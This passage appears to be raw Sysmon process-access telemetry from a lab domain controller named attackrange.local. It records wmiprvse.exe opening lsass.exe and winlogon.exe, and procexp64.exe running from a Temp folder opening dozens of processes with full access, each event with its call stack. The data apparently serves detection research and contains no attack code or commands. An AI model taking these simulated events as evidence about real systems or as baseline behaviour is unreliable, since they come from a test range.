15:16:06.174{732C744F-3235-6010-C4A2-00000000A301}48407348C:\Windows\system32\wbem\wmiprvse.exe{732C744F-151A-600B-0E00-00000000A301}1076C:\Windows\system32\LogonUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x8000000000000000786777Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:06.174{732C744F-3235-6010-C4A2-00000000A301}48407348C:\Windows\system32\wbem\wmiprvse.exe{732C744F-151A-600B-0D00-00000000A301}624C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x8000000000000000786776Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:06.174{732C744F-3235-6010-C4A2-00000000A301}48407348C:\Windows\system32\wbem\wmiprvse.exe{732C744F-151A-600B-0C00-00000000A301}584C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x8000000000000000786775Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:06.174{732C744F-3235-6010-C4A2-00000000A301}48407348C:\Windows\system32\wbem\wmiprvse.exe{732C744F-1518-600B-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x8000000000000000786774Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:06.174{732C744F-3235-6010-C4A2-00000000A301}48407348C:\Windows\system32\wbem\wmiprvse.exe{732C744F-1518-600B-0900-00000000A301}796C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x8000000000000000787136Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:07.674{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-3235-6010-C4A2-00000000A301}4840C:\Windows\system32\wbem\wmiprvse.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ntdll.dll+6cd1a|C:\Windows\System32\KERNEL32.DLL+1cff8|C:\Windows\System32\KERNEL32.DLL+25a87|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+4e7ac|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+50417|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0cfe|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787135Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:07.674{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-3235-6010-C4A2-00000000A301}4840C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscordbi.dll+77951|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscordbi.dll+77a03|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscordbi.dll+1b2ca|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscordbi.dll+1b1c9|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+6e587|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0cef|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787134Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:07.674{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-3235-6010-C4A2-00000000A301}4840C:\Windows\system32\wbem\wmiprvse.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787133Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:07.674{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-31A3-6010-A3A2-00000000A301}6416C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787132Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:07.674{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-31A3-6010-A2A2-00000000A301}7260C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787131Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:07.674{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-31A1-6010-A1A2-00000000A301}6836C:\Windows\system32\DllHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787130Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:07.674{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2A78-6010-96A1-00000000A301}4816C:\Users\Administrator\Downloads\procexp.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787129Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:07.674{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2808-600F-DC82-00000000A301}1436C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787128Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:07.674{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2808-600F-DB82-00000000A301}7708C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787127Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:07.674{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2806-600F-D682-00000000A301}6624C:\Windows\explorer.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787126Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:07.658{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1EBE-600B-A206-00000000A301}7468C:\Program Files\Notepad++\notepad++.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787125Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:07.658{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1DB4-600B-1E06-00000000A301}2936C:\Program Files (x86)\Google\Update\1.3.36.52\GoogleCrashHandler64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787124Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:07.658{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1DB4-600B-1D06-00000000A301}5472C:\Program Files (x86)\Google\Update\1.3.36.52\GoogleCrashHandler.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787123Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:07.658{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1D92-600B-0806-00000000A301}4464C:\Windows\system32\fontdrvhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787122Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:07.658{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1D85-600B-0706-00000000A301}7696C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787121Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:07.658{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1D85-600B-0606-00000000A301}4952C:\Program Files\Internet Explorer\iexplore.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787120Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:07.658{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17E2-600B-A401-00000000A301}5528C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787119Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:07.658{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17E2-600B-A101-00000000A301}5376C:\Windows\System32\rdpclip.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787118Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:07.658{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17E0-600B-9701-00000000A301}2256C:\Windows\system32\dwm.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787117Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:07.658{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17DF-600B-9501-00000000A301}1036C:\Windows\system32\winlogon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787116Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:07.658{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17DF-600B-9401-00000000A301}5084C:\Windows\system32\csrss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787115Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:07.658{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-15A8-600B-E200-00000000A301}4204C:\Windows\System32\msdtc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787114Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:07.658{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-15A1-600B-DF00-00000000A301}3152C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787113Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:07.658{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-159B-600B-D600-00000000A301}2808C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787112Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:07.658{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1593-600B-AC00-00000000A301}4656C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787111Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:07.658{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1593-600B-A800-00000000A301}2616C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787110Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:07.658{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152F-600B-5900-00000000A301}3940C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787109Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:07.658{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152E-600B-5500-00000000A301}3732C:\Program 